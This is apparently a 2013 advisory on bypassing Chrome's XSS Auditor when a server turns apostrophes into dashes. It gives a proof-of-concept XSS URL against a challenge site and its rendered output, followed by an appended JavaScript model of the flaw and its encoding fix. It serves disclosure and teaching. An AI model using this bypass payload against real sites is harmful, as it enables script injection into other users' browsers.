Google Chrome 31.0 Webkit Auditor Bypass
Source:  Author: Vila  Published: 2013-09-25
# Title: Chrome 31.0 Webkit XSS Auditor Bypass
# Product: Google Chrome
# Author: Rafay Baloch @rafaybaloch And PEPE Vila
# Company: Majorsecurity GMBH
# Website: Majorsecurity.com

============
Description
============

Chrome XSS Auditor is a client-side XSS filter used by Google Chrome
to protect against XSS attacks. The Chrome XSS filter has already been beaten
lots of times, so we thought, why don't we give it a try?

============
Vulnerability
============

A certain criterion needs to be met for this bypass: the server-side
filter should convert an apostrophe ' to a dash -, which is a commonly
known practice.

================
Proof of concept
================

The following is a challenge set up by a gentleman with the nick "Strong boi":

http://12342.site11.com/level2.php

The expected solution was to use a well-known unfixed bug in Chrome,
using both parameters a and b to execute the JavaScript. However, we
noticed a different behavior when we injected an apostrophe: it was being
converted to - and hence yielding valid syntax and executing the
JavaScript.


http://12342.site11.com/level2.php?a=%22%3E%3Cscript%3E'alert(0);%3C/script%3E

Output Source:

First search:<input type="text" name="a"
value="<script>1-alert(0);</script>"/><br>
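
The mechanism described above, modelled as an added example (not code from the advisory, the challenge page or Chrome): a reflection-matching filter stops recognising the script once the server rewrites a character in it, while attribute encoding on the server removes the injection entirely. All function names are hypothetical, and `reflectionFilterFlags` is a deliberately simplified stand-in for a client-side filter that compares the request with the response.

```javascript
// Constructed model of the page's scenario; every name here is hypothetical.

// The weak server-side "filter" the advisory describes: apostrophe -> dash.
function weakFilter(input) {
  return input.replace(/'/g, "-");
}

// Correct handling for an HTML attribute context: encode, do not substitute.
function encodeAttr(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Renders the input field the way the page's "Output Source" shows it.
function render(value) {
  return `First search:<input type="text" name="a" value="${value}"/><br>`;
}

// Simplified reflection matching (assumption, not Chrome's algorithm):
// flag the response if an inline script body also appears verbatim in the request.
function reflectionFilterFlags(requestValue, responseHtml) {
  const scripts = [...responseHtml.matchAll(/<script[^>]*>([\s\S]*?)<\/script>/gi)];
  return scripts.some((m) => m[1].length > 0 && requestValue.includes(m[1]));
}

// True if the response contains a live <script> element at all.
function hasLiveScript(responseHtml) {
  return /<script[^>]*>/i.test(responseHtml);
}

// Compare three server behaviours for the same request value.
function evaluate(requestValue) {
  const handlers = { raw: (s) => s, weak: weakFilter, encoded: encodeAttr };
  const rows = {};
  for (const [name, fn] of Object.entries(handlers)) {
    const html = render(fn(requestValue));
    rows[name] = {
      liveScript: hasLiveScript(html),
      flagged: reflectionFilterFlags(requestValue, html),
    };
  }
  return rows;
}

// URL-decoded value of parameter a from the request shown on the page.
const SAMPLE = `"><script>'alert(0);</script>`;
console.log(evaluate(SAMPLE));
```

Only the `encoded` row has no live script; the `weak` row has one that the reflection check no longer matches, which is why character substitution is not a replacement for contextual output encoding.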

 